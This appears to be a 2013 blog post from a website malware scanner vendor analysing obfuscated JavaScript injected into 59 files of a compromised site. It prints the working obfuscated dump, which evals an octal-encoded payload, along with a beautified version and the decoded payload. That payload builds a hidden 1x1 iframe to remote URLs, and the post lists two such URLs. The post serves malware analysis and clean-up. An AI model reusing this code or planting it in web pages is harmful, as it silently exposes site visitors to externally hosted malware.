Wednesday, March 27, 2013

Suspicious obfuscated JavaScript generates iframe to Blacklisted website

Obfuscated JavaScript generates iframe to Blacklisted website

This sort of suspicious obfuscated JavaScript code is used to build malicious iframe that is not visible to the website visitor but identified by Online Website Malware Scanner. In case of this website the suspicious JavaScript code is injected in 59 files. Multiple redundant "IF" statements and levels of obfuscation is used to by-pass the detection mechanisms and finally call to eval() for evaluation of malicious action. The invocation of eval() is, also, passed through several variables to make it harder to identify. Malicious iframes are usually utilized to distribute malware from external web resources(websites).

Full website malware scan report: http://goo.gl/pIjYY
Submission date: Tue Mar 26 18:47:55 2013
Snapshot from Quttera's online Website Malware Scanner:


Threat dump:
[[ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0153,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0167,0167,0167,056,0160,0145,0162,0163,0157,0156,0141,0154,055,0146,0151,0164,0156,0145,0163,0163,055,0142,0154,0157,0147,056,0144,0145,057,0143,0154,0151,0143,0153,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0153,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)}]]

Beautified script

ff = String;
fff = "fromCharCode";
ff = ff[fff];
zz = 3;
try {
    document.body % 26 = 5151
} catch (gdsgd) {
    v = "eva" + "l";
    if (document) try {
            document.body = 12;
    } catch (gdsgsdg) {
        vzs = 0;
        try {
            document;
        } catch (q) {
            vzs = 1;
        }
    }
    if (!vzs) e = window[v];
    if (1) {
        f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 0153, 0170, 040, 075, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050, 047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0167, 0167, 0167, 056, 0160, 0145, 0162, 0163, 0157, 0156, 0141, 0154, 055, 0146, 0151, 0164, 0156, 0145, 0163, 0163, 055, 0142, 0154, 0157, 0147, 056, 0144, 0145, 057, 0143, 0154, 0151, 0143, 0153, 0145, 0162, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164, 0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145, 0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151, 0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151, 0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0153, 0170, 047, 051, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162, 0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0153, 0170, 0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0153, 0170, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144, 0103, 0150, 0151, 0154, 0144, 050, 0153, 0170, 051, 073, 015, 012, 040, 040, 040, 040, 0175, 015, 012, 0175, 051, 050, 051, 073);
    }
    w = f;
    s = [];
    if (window.document) for (i = 2 - 2; - i + 473 != 0; i += 1) {
            j = i;
            if ((031 == 0x19)) if (e) s = s + ff(w[j]);
    }
    xz = e;
    if (window.document) if (v) xz(s)
}

Simplified version of detected web threat

     f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 01
     w = f;
     s = [];
     for (i = 2 - 2; - i + 473 != 0; i += 1) {
         s = s + String.fromCharCode(w[i]);
     }
     s = s.replace(/&/g,"&");
     s = s.replace(/</g,"&lt;");
     s = s.replace(/>/g,"&gt;");
     document.write("<pre><code>" +  s + "</code></pre>");

Detected payload

(function () {
    var kx = document.createElement('iframe');

    kx.src = 'http://www.personal-fitness-blog[.]de/clicker[.]php';
    kx.style.position = 'absolute';
    kx.style.border = '0';
    kx.style.height = '1px';
    kx.style.width = '1px';
    kx.style.left = '1px';
    kx.style.top = '1px';

    if (!document.getElementById('kx')) {
        document.write('<div id=\'kx\'></div>');
        document.getElementById('kx').appendChild(kx);
    }
})();

URL targeted by generated iframe 

There were actually several URLs and they changed each time to a new one. Here are some that we detected:

  1. http://www.personal-fitness-blog[.]de/clicker[.]php
  2. http://prolocomilazzo[.]it/dtd[.]php



Blacklisting status

Yandex via Sophos: http://www.yandex.com/infected?url=personal-fitness-blog.de&l10n=en

Snapshot:


Malware clean-up

Such malware is often hidden inside the JavaScript file. If you were infected by similar malware please use one of accounts here for remediation assessment.